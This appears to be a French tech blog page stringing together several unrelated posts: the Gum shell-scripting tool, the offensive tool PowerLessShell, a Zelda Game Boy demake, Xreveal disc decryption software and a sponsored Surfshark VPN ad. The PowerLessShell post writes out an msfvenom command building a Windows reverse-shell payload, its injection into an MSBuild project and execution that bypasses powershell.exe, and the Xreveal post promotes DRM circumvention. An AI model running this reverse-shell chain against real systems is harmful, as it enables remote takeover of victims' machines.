Voici un outil fantastique nommé Gum qui va vous permettre d’écrire des scripts Shell et de gérer vos dotfiles en quelques lignes de code seulement, et après l’avoir testé, je suis sûr que vous ne pourrez plus vous en passer.

Voici un exemple de ce qu’il est possible de faire avec Gum :

Et voici le code associé :

#!/bin/bash

gum style --border normal --margin "1" --padding "1 2" --border-foreground 212 "Hello, there! Welcome to $(gum style --foreground 212 'Gum')."
NAME=$(gum input --placeholder "What is your name?")

echo -e "Well, it is nice to meet you, $(gum style --foreground 212 "$NAME")."

sleep 2; clear

echo -e "Can you tell me a $(gum style --italic --foreground 99 'secret')?\n"

gum write --placeholder "I'll keep it to myself, I promise!" > /dev/null # we keep the secret to ourselves

clear; echo "What should I do with this information?"; sleep 1

READ="Read"; THINK="Think"; DISCARD="Discard"
ACTIONS=$(gum choose --cursor-prefix "[ ] " --selected-prefix "[✓] " --no-limit "$READ" "$THINK" "$DISCARD")

clear; echo "One moment, please."

grep -q "$READ" <<< "$ACTIONS" && gum spin -s line --title "Reading the secret..." -- sleep 1
grep -q "$THINK" <<< "$ACTIONS" && gum spin -s pulse --title "Thinking about your secret..." -- sleep 1
grep -q "$DISCARD" <<< "$ACTIONS" && gum spin -s monkey --title " Discarding your secret..." -- sleep 2

sleep 1; clear

echo "What's your favorite $(gum style --foreground 212 "Gum") flavor?"
GUM=$(echo -e "Cherry\nGrape\nLime\nOrange" | gum filter)
echo "I'll keep that in mind!"

sleep 1; clear

echo "Do you like $(gum style --foreground "#04B575" "Bubble Gum?")"
sleep 1

CHOICE=$(gum choose --item.foreground 250 "Yes" "No" "It's complicated")

[[ "$CHOICE" == "Yes" ]] && echo "I thought so, $(gum style --bold "Bubble Gum") is the best." || echo "I'm sorry to hear that."

sleep 1

gum spin --title "Chewing some $(gum style --foreground "#04B575" "$GUM") bubble gum..." -- sleep 5

clear

NICE_MEETING_YOU=$(gum style --height 5 --width 25 --padding '1 3' --border double --border-foreground 57 "Well, it was nice meeting you, $(gum style --foreground 212 "$NAME"). Hope to see you soon!")
CHEW_BUBBLE_GUM=$(gum style --width 25 --padding '1 3' --border double --border-foreground 212 "Don't forget to chew some $(gum style --foreground "#04B575" "$GUM") bubble gum.")
gum join --horizontal "$NICE_MEETING_YOU" "$CHEW_BUBBLE_GUM"

Pour l’installer, vous pouvez le faire soit avec un gestionnaire de paquets ou en le téléchargeant directement. Des packages sont d’ailleurs disponibles pour Debian, RPM et Alpine, ainsi que des binaires pour Linux, macOS (brew install gum), Windows (scoop install charm-gum), FreeBSD, OpenBSD et NetBSD.

Et si vous préférez, vous pouvez même l’installer à l’aide de Go. Personnellement, j’adore le côté flexible de Gum : il peut être intégré dans des scripts et adapté à votre convenance grâce aux options de configuration et aux variables d’environnement, ce qui vous permet par exemple de personnaliser la couleur du curseur ou la largeur de l’affichage.

La documentation est très complète à ce sujet.

Ainsi, la commande « gum input » permet de demander une entrée à l’utilisateur, tandis que « gum write » fonctionne pour une entrée multi-ligne.

Envie de filtrer une liste de valeurs en utilisant la correspondance floue ? Gum est là pour ça avec « gum filter« . Et si vous avez besoin d’aide pour choisir une option à partir d’une liste de choix, « gum choose » sera votre meilleur allié.

Même la commande « gum confirm » rend la vie plus simple en demandant si une action doit être effectuée ou non. J’apprécie également énormément l’option « gum file« , qui me permet de sélectionner un fichier directement depuis l’arborescence des fichiers, et la commande « gum spin » ne manque pas de me rappeler que Gum travaille fort fort fort pour moi en affichant un spinner (vous savez, le petit cercle qui tourne pour vous faire patienter) pendant qu’une commande ou un script s’exécute.

Voici un autre exemple de code :

#!/bin/sh
TYPE=$(gum choose "fix" "feat" "docs" "style" "refactor" "test" "chore" "revert")
SCOPE=$(gum input --placeholder "scope")

# Since the scope is optional, wrap it in parentheses if it has a value.
test -n "$SCOPE" && SCOPE="($SCOPE)"

# Pre-populate the input with the type(scope): so that the user may change it
SUMMARY=$(gum input --value "$TYPE$SCOPE: " --placeholder "Summary of this change")
DESCRIPTION=$(gum write --placeholder "Details of this change (CTRL+D to finish)")

# Commit these changes
gum confirm "Commit changes?" && git commit -m "$SUMMARY" -m "$DESCRIPTION"

Et le rendu dans le terminal :

Outre ces commandes de base, Gum propose également une panoplie d’options pour s’adapter à vos besoins spécifiques. Les différents types de spinner incluent ligne, point, minidot, saut, impulsion, points, globe, lune, un singe (!), mètre et même un hamburger. La commande de tableau est très pratique pour sélectionner des données tabulaires, tandis que le style et la mise en page sont personnalisables à loisir pour combiner texte de manière verticale ou horizontale, ou encore pour traiter et formater les paragraphes. Pour plus d’informations sur les modèles, pensez encore une fois à consulter la documentation.

Mais ce qui fait vraiment la force de Gum, c’est sa capacité à être intégré à diverses tâches du quotidien. Qui n’a jamais souhaité écrire un message de commit en un instant, ouvrir des fichiers dans son éditeur de texte préféré, se connecter à une session TMUX, sélectionner un hash de commit dans son historique Git, choisir des mots de passe avec Skate, ou encore supprimer des branches en deux temps trois mouvements ?

Un tour d’horizon des exemples du répertoire Gum vous convaincra d’autant plus de l’intérêt de cet outil.

Gum est à découvrir ici !

PowerLessShell est un outil incroyable pour les passionnés de PowerShell et de sécurité informatique. Qui aurait cru qu’on pouvait exécuter des scripts et des commandes PowerShell sans même lancer powershell.exe ? Et pour couronner le tout, il permet également d’exécuter du shellcode brut ! C’est de la sorcellerie !

La puissance de cet outil réside dans son utilisation de MSBuild.exe. La combinaison des deux permet d’obtenir un résultat vraiment cool pour les pro du Powershell. Certaines conditions peuvent être utilisées avec MSBuild pour empêcher l’exécution du code si elles ne sont pas remplies, ce qui ajoute une couche de sécurité.

La beauté de PowerLessShell, c’est qu’il utilise des arguments de ligne de commande pour générer le fichier final et il peut générer une charge utile PowerShell ou shellcode. C’est donc très utile également pour les pros en sécurité informatique.

Le concept est très bien expliqué avec des exemples concrets comme celui-ci :

$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed

Le processus est assez simple et direct, même pour ceux qui n’ont pas beaucoup d’expérience avec PowerShell ou MSBuild.

Et ce n’est pas tout ! Un script nommé Cobalt Strike Aggressor (wmi_msbuild.cna) est également disponible avec des instructions pour la configuration et l’utilisation. Si vous n’avez jamais entendu parler de Cobalt Strike, c’est une plateforme de post-exploitation professionnelle de qualité militaire.

Le plus impressionnant, c’est que tout ceci a été mis au point par une seule personne : Mr.Un1k0d3r.

Alors, comment utiliser ce merveilleux outil en pratique ?

Voici un exemple d’utilisation de PowerLessShell pour générer un shellcode avec l’outil msfvenom de Metasploit et ensuite l’exécuter avec MSBuild :

msfvenom -a x64 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b '\\x00\\x0A\\x0D' -i 20 -f csharp

Ensuite, utilisez PowerLessShell pour injecter le shellcode dans un fichier MSBuild :

PowerLessShell.exe -s <shellcode> -w 20

Finalement, exécutez le fichier malveillant avec MSBuild :

MSBuild.exe malicious.csproj

Voilà, le tour est joué ! Il vous suffira d’écouter la connexion entrante shell_reverse_tcp sur votre serveur pour guetter la connexion du client malveillant et prendre le contrôle. C’est un exemple simple mais puissant de ce que PowerLessShell peut faire. Evidemment, c’est à manipuler avec éthique, dans un cadre de recherche ou lors d’une mission de sécurité informatique.

En conclusion, que vous soyez un professionnel de la sécurité informatique ou simplement quelqu’un qui aime bidouiller et apprendre, cet outil vous surprendra à coup sûr. N’hésitez pas à visiter le GitHub de PowerLessShell pour en savoir plus ici.

Si vous êtes un vrai fan de la série Zelda, vous vous souvenez probablement de ces jeux Zelda CD-i des années 90 qui n’ont pas été très appréciés par les fans. Eh bien, il semblerait qu’un développeur indépendant, John Lay, soit parvenu à transformer l’un de ces jeux, Zelda’s Adventure, en une version améliorée pour Game Boy ! Incroyable, n’est-ce pas ?

Le projet de John Lay consiste à adapter Zelda’s Adventure pour la Game Boy en utilisant GB Studio, une application bien connue pour créer des jeux Game Boy. Ce qui est vraiment intéressant avec ce projet, c’est qu’il parvient à incorporer des éléments graphiques de Link’s Awakening ainsi que des fonctionnalités d’Oracle of Ages et Oracle of Seasons. Autrement dit, ce de-make de Zelda’s Adventure offre donc une expérience nostalgique et authentique pour les fans de la série Zelda.

Maintenant, pour ceux qui ont eu la chance d’essayer ce jeu, il n’a pas été épargné par les bugs et de problèmes et vous pourriez y rencontrer des plantâmes, mais soyez indulgents, car c’est vraiment un projet unique fait par un fan.

En ce qui me concerne, j’ai hâte d’essayer cette nouvelle version de Zelda’s Adventure sur ma vieille Game Boy ! Et qui sait, peut-être que cela encouragera d’autres développeurs indépendants à redonner vie à d’autres jeux oubliés de notre enfance.

Pour ceux qui sont intéressés par le jeu, il se trouve qu’une version est disponible en téléchargement.

À découvrir ici ! (c’est prix libre !)

Bonne exploration à tous!

Aujourd’hui, je vous présente Xreveal, le petit génie dans la lampe qui va vous permettre de déchiffrer vos DVD et Blu-ray en arrière-plan, le tout en un rien de temps ! Mais avant de vous en dire plus, mettons les choses au clair : vous aurez besoin de clés de décryptage AACS/FUT BD+ pour faire fonctionner ce logiciel.

À première vue, Xreveal peut sembler un simple logiciel de déchiffrement de DVD/BD, mais détrompez-vous, il est bien plus que ça. Ce logiciel est le fruit d’un projet de recherche visant à faciliter l’interopérabilité et s’appuie exclusivement sur la spécification publique officielle AACS pour décoder les disques. En d’autres termes, Xreveal est un précieux allié pour les adeptes du Home Cinéma tels que vous et moi.

Grâce à Xreveal, fini les problèmes de lecture de DVD ou de Blu-ray protégés par un système de verrouillage. En effet, ce logiciel déchiffre la sécurité des DVD/BD à la volée, permettant ainsi à votre programme de lecture ou de copie de les lire sans aucune difficulté. C’est comme avoir son propre passe-partout pour accéder à tous ces films que vous adorez ! 🗝️

L’un des points forts de Xreveal réside dans sa simplicité d’utilisation. Une fois le logiciel installé, il fonctionne en arrière-plan sans même que vous vous en aperceviez. En parallèle, il vous donne la possibilité de lire ou de copier vos DVD/BD protégés en toute tranquillité.Maintenant que vous êtes convaincus de la puissance de Xreveal, voici un petit tutoriel pour vous aider à l’installer et à l’utiliser:

2. Installez Xreveal en suivant les instructions à l’écran.
4. Le logiciel est maintenant prêt à l’emploi ! Insérez un DVD ou Blu-ray protégé dans le lecteur de votre choix et Xreveal déchiffrera automatiquement le disque à la volée pour que vous puissiez le lire sans problème.

Et voilà, le tour est joué ! Vous pouvez désormais profiter de tous vos DVD et Blu-ray sans vous soucier des systèmes de protection. Alors oui, je sais, ça serait mieux avec la clé de déchiffrement, mais comme c’est illégal de la partager, bah c’est pas dans le soft.

En somme, si vous êtes à la recherche d’une solution simple et efficace pour décoder vos DVD et Blu-ray, ne cherchez pas plus loin. Xreveal est sans conteste l’outil qu’il vous faut. À noter que Xreveal n’a pas pour vocation de promouvoir le piratage. Il s’agit simplement d’un outil d’interopérabilité pour les passionnés de Home Cinéma.

À découvrir ici

— Article en partenariat avec Surfshark —

C’est fou les amis, c’est fou. Vous avez vu à quelle vitesse passe cet été ? Je m’amuse à gauche et à droite dans la maison, je tourne la tête et paf la rentré n’est déjà plus si loin (encore un peu à profiter, mais quand même). Cela dit j’espère que pour certains d’entre vous c’est encore les vacances ou que vous serez bientôt dedans. Et l’article d’aujourd’hui va justement parler de votre protection numérique lorsque vous partez à l’étranger.

Je l’ai mentionné rapidement dans mon article précédent sur Surfshark VPN, mais nous sommes en pleine période de vagabondage « personnes en déplacement ». Vous partez bien pépouse dans un pays exotique (comme l’Espagne) ou vous allez vous dorer la pilule sur une belle plage de sable blanc (type Dunkerque ou encore mieux la côte belge) ? Voire vous avez décidé de faire le tour de l’Hexagone en van à pédales ou de tester les meilleurs hôtels de Brive-la-Gaillarde ? Et bien du coup vous allez sans doute devoir vous connecter à de nombreux wifi et autres hotspots publics. Pas toujours sécurisés et qui peuvent mettre en danger vos informations personnelles.

Donc si vous hésitez depuis quelque temps à prendre un VPN, c’est l’occasion. Déjà parce que dans tous les cas vous devriez en avoir un depuis longtemps, ensuite parce qu’avoir l’esprit un peu plus tranquille en vacances ce n’est jamais de trop ! Et cela sans travail supplémentaire de votre part puisque Surfshark prend tout en compte pour vous de manière automatisée via une interface épurée et simple à prendre en main.

Il va vous protéger d’une multitude d’attaques et de risques potentiels comme de :

• naviguer sur la toile en toute sécurité (chiffrement AES-256 et IKEv2/IPse avec option OpenVPN ou WireGuard)
• utiliser vos applis favorites sans laisser de traces
• camoufler vos activités à votre FAI
• protéger contre le leak DNS
• connexion sur des réseaux publics de manière sécurisée
• …etc.

Parmi les nombreuses autres fonctionnalités proposées : bloqueur de pubs, bouton kill switch, split tunneling, MultiHop dynamique, GPS-Spoofing pour Android, changement d’IP automatique ou IP dédiée, création d’une liste blanche … bref il a tout ce qu’il faut ! Et je n’oublie pas de vous rappeler que vous aurez accès aux catalogues Netflix ou Spotify de n’importe quel pays dans le monde. Parce qu’il faut bien s’occuper pendant votre farniente.

Surfshark fait régulièrement partie du haut du panier des meilleurs VPN. Que ce soit pour l’aspect rapidité (3200 serveurs haut débit dispatchés dans une centaine de pays) ou l’aspect sécurité. Ils sont d’ailleurs audités régulièrement (avec succès jusqu’ici) et leur politique de non-conservation de vos données a été authentifiée à plusieurs reprises.

Cerise sur le gâteau, vous n’avez pas à vous inquiéter du nombre d’appareils à prendre en villégiature avec vous : le service vous offre l’illimité ! Votre laptop, les smartphones des parents et des 8 enfants, les 2 tablettes des chiens … tout sera couvert. Même si vous partez en camion grand luxe avec SmartTV et consoles de jeux vidéos, c’est pris en charge. Et cela quel que soit votre OS ou votre navigateur de préférence (Linux, Windows, macOS, Android, iOS, Fire TV, Edge, Chrome, Firefox …).

Surfshark vous offre aussi une certaine flexibilité en termes d’ajouts possible si vous voulez aller plus loin dans la gestion de votre vie privée et de vos défenses numériques. Solution antivirus, protection de vos caméras et microphones, moteur de recherche privé, alertes mails ou nettoyage de vos infos perso sur le web (via Incogni) … tout est possible. À vous de faire votre sauce.

Bref vous l’avez compris, la période de vacances est peut-être un des moments les plus « à risques » pour vos données. Chez soi ou à son travail, on maitrise toujours mieux son réseau qu’on ne peut le faire en déplacement. J’utilise personnellement le VPN requin depuis plusieurs années, dans un peu toutes les situations (vous connaissez ma vie de ministre) et j’en reste très très satisfait !!

Au tarif de 2.49 €/mois pour dormir sur vos 2 oreilles durant cette coupure dans votre vie quotidienne, c’est honnête 😉 Et c’est satisfait ou remboursé durant 30 jours. Au niveau des paiements acceptés vous avez à peu près toutes les options : CB, PayPal, Apple/Amazon/Google Pay et même les cryptomonnaies.

Partez l’esprit tranquille avec Surfshark VPN !